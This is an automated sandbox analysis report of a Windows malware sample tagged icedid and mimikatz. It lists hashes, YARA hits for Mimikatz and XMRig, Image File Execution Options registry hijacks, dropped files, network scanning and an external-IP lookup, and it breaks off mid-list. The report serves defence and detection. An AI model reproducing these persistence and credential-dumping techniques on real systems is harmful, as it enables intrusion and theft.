Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-10-2024 07:48
Behavioral task
behavioral1
Sample
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe
-
Size
10.0MB
-
MD5
9be6b6720cd4469db64c0257ad8d7f44
-
SHA1
2abaaab7cec23fb3d3989ebab3a0906b6c90e3de
-
SHA256
316828b589110bb2cf71f1b38add845d787ae95f557d5bbc7221c8db9bc60e00
-
SHA512
93cfafed7040d4919582f068e519ee55f7597eb37f1882c11ccbb4c697e99c30a29eecb3cdf4b685f6ff0cff7d042047c2e591548491047e69168883deefe495
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
lbbuleg.exedescription pid Process procid_target PID 2808 created 1020 2808 lbbuleg.exe 17 -
Contacts a large (23152) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral1/memory/2304-189-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-197-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-225-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-227-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-228-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-229-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-230-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-245-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-256-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-364-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-367-0x000000013F520000-0x000000013F640000-memory.dmp xmrig behavioral1/memory/2304-368-0x000000013F520000-0x000000013F640000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
Processes:
resource yara_rule behavioral1/memory/2996-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2996-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x0008000000016df8-5.dat mimikatz behavioral1/memory/2812-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/3068-138-0x000000013FD30000-0x000000013FE1E000-memory.dmp mimikatz behavioral1/memory/2808-166-0x0000000002F60000-0x0000000003080000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
lbbuleg.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts lbbuleg.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts lbbuleg.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
lbbuleg.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe lbbuleg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" lbbuleg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe lbbuleg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 2648 netsh.exe 2124 netsh.exe -
Executes dropped EXE 18 IoCs
Processes:
lbbuleg.exelbbuleg.exewpcap.exelvutgsgsu.exevfshost.exexohudmc.exehuzbeq.exesyvsdbgfd.exetushzd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exesyvsdbgfd.exelbbuleg.exesyvsdbgfd.exesyvsdbgfd.exeetwsuhquc.exelbbuleg.exepid Process 2812 lbbuleg.exe 2808 lbbuleg.exe 1504 wpcap.exe 2520 lvutgsgsu.exe 3068 vfshost.exe 704 xohudmc.exe 1732 huzbeq.exe 688 syvsdbgfd.exe 2304 tushzd.exe 2068 syvsdbgfd.exe 2696 syvsdbgfd.exe 536 syvsdbgfd.exe 2760 syvsdbgfd.exe 1072 lbbuleg.exe 1724 syvsdbgfd.exe 2076 syvsdbgfd.exe 2176 etwsuhquc.exe 2280 lbbuleg.exe -
Loads dropped DLL 24 IoCs
Processes:
cmd.execmd.exewpcap.execmd.exelvutgsgsu.execmd.exelbbuleg.execmd.exepid Process 2680 cmd.exe 2680 cmd.exe 664 cmd.exe 1504 wpcap.exe 1504 wpcap.exe 1504 wpcap.exe 1504 wpcap.exe 1504 wpcap.exe 1092 cmd.exe 2520 lvutgsgsu.exe 2520 lvutgsgsu.exe 984 cmd.exe 984 cmd.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 2808 lbbuleg.exe 1648 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 18 ifconfig.me 19 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
Processes:
lbbuleg.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat lbbuleg.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 lbbuleg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF lbbuleg.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\huzbeq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\huzbeq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 lbbuleg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF lbbuleg.exe -
Processes:
resource yara_rule behavioral1/memory/3068-136-0x000000013FD30000-0x000000013FE1E000-memory.dmp upx behavioral1/files/0x000500000001a49f-133.dat upx behavioral1/memory/3068-138-0x000000013FD30000-0x000000013FE1E000-memory.dmp upx behavioral1/files/0x000500000001a4d2-159.dat upx behavioral1/memory/2808-161-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/files/0x000500000001a4d7-164.dat upx behavioral1/memory/2304-168-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/688-171-0x000000013F1A0000-0x000000013F1FB000-memory.dmp upx behavioral1/memory/2068-177-0x000000013F040000-0x000000013F09B000-memory.dmp upx behavioral1/memory/2068-179-0x000000013F040000-0x000000013F09B000-memory.dmp upx behavioral1/memory/2808-182-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/2696-186-0x000000013FAA0000-0x000000013FAFB000-memory.dmp upx behavioral1/memory/2304-189-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2808-191-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/536-195-0x000000013F380000-0x000000013F3DB000-memory.dmp upx behavioral1/memory/2304-197-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2808-200-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/2760-203-0x000000013F020000-0x000000013F07B000-memory.dmp upx behavioral1/memory/2808-210-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/1724-214-0x000000013FCB0000-0x000000013FD0B000-memory.dmp upx behavioral1/memory/2808-220-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/2076-222-0x000000013F160000-0x000000013F1BB000-memory.dmp upx behavioral1/memory/2808-224-0x0000000001A20000-0x0000000001A7B000-memory.dmp upx behavioral1/memory/2304-225-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-227-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-228-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-229-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-230-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-245-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-256-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-364-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-367-0x000000013F520000-0x000000013F640000-memory.dmp upx behavioral1/memory/2304-368-0x000000013F520000-0x000000013F640000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
lbbuleg.exeetwsuhquc.exe2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execmd.exedescription ioc Process File opened for modification C:\Windows\ebhtlebeq\bdhueueqm\Packet.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\wpcap.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\upbdrjv\swrpwe.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\libeay32.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\trch-1.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\tucl-1.dll lbbuleg.exe File created C:\Windows\vswcughu\docmicfg.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\docmicfg.xml lbbuleg.exe File created C:\Windows\vswcughu\schoedcl.xml lbbuleg.exe File opened for modification C:\Windows\vswcughu\svschost.xml lbbuleg.exe File opened for modification C:\Windows\vswcughu\spoolsrv.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\etwsuhquc.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\libxml2.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\schoedcl.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\svschost.xml lbbuleg.exe File opened for modification C:\Windows\vswcughu\vimpcsvc.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\Corporate\mimidrv.sys lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\lvutgsgsu.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\posh-0.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\svschost.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\schoedcl.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\trfo-2.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\xdvl-0.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\zlib1.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\svschost.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\ip.txt lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\ssleay32.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\ucl.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\docmicfg.xml lbbuleg.exe File created C:\Windows\vswcughu\vimpcsvc.xml lbbuleg.exe File opened for modification C:\Windows\ebhtlebeq\bdhueueqm\Result.txt etwsuhquc.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\tibe-2.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\schoedcl.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\AppCapture32.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\scan.bat lbbuleg.exe File created C:\Windows\ebhtlebeq\bdhueueqm\Packet.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\coli-0.dll lbbuleg.exe File created C:\Windows\vswcughu\spoolsrv.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\vimpcsvc.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\spoolsrv.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\Corporate\vfshost.exe lbbuleg.exe File created C:\Windows\ime\lbbuleg.exe lbbuleg.exe File created C:\Windows\vswcughu\lbbuleg.exe 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\vswcughu\lbbuleg.exe 2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.exe File created C:\Windows\ebhtlebeq\bdhueueqm\wpcap.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\spoolsrv.xml lbbuleg.exe File created C:\Windows\vswcughu\svschost.xml lbbuleg.exe File opened for modification C:\Windows\vswcughu\schoedcl.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\exma-1.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\spoolsrv.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\vimpcsvc.exe lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\Shellcode.ini lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\AppCapture64.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\Corporate\mimilib.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\crli-0.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\vimpcsvc.xml lbbuleg.exe File opened for modification C:\Windows\vswcughu\docmicfg.xml lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\cnli-1.dll lbbuleg.exe File created C:\Windows\ebhtlebeq\UnattendGC\specials\docmicfg.exe lbbuleg.exe File opened for modification C:\Windows\ebhtlebeq\Corporate\log.txt cmd.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 1312 sc.exe 2520 sc.exe 1140 sc.exe 1704 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exewpcap.exenet.exenet1.execmd.exesc.exehuzbeq.execmd.exePING.EXEnet.exenet1.exenet.exenet1.execmd.execmd.execmd.exenet.exesc.exeetwsuhquc.exe2024-10-18_9be6b6720cd4469db64c0257ad8d7f44_hacktools_icedid_mimikatz.execacls.exenet1.exenetsh.exenet.exenet1.execmd.execmd.execmd.exenetsh.exexohudmc.execacls.execmd.exenet.exelvutgsgsu.exenetsh.execmd.execacls.exenet.execmd.execmd.exeschtasks.exenet.execmd.exelbbuleg.execmd.exenetsh.exenetsh.execmd.execmd.execmd.exeschtasks.exenetsh.execmd.execacls.execmd.exenet1.exenetsh.execmd.exenet1.execmd.execmd.execmd.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language huzbeq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened 